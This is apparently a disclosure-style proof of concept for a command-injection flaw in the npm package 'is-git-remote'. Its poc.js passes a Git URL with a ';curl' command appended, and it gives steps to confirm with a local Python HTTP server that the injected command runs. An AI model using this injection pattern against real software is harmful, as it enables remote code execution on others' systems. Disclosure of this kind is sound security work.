The issue occurs because a user input
is formatted inside a command
that will be executed without any check.
// poc.js
const isGitRemote = require("is-git-remote");
isGitRemote.default(
'https://github.com/Mik317/PyScan.git;curl "http://localhost/RCE"'
);
py
server in order to verify the cUrl
command: python3 -m http.server 80
npm i is-git-remote # Install affected module
git init # Avoid problems with the file validation
node poc.js # Run the PoC
cUrl
command will be executed ... and the py
server will receive a request to the http://localhost/RCE
address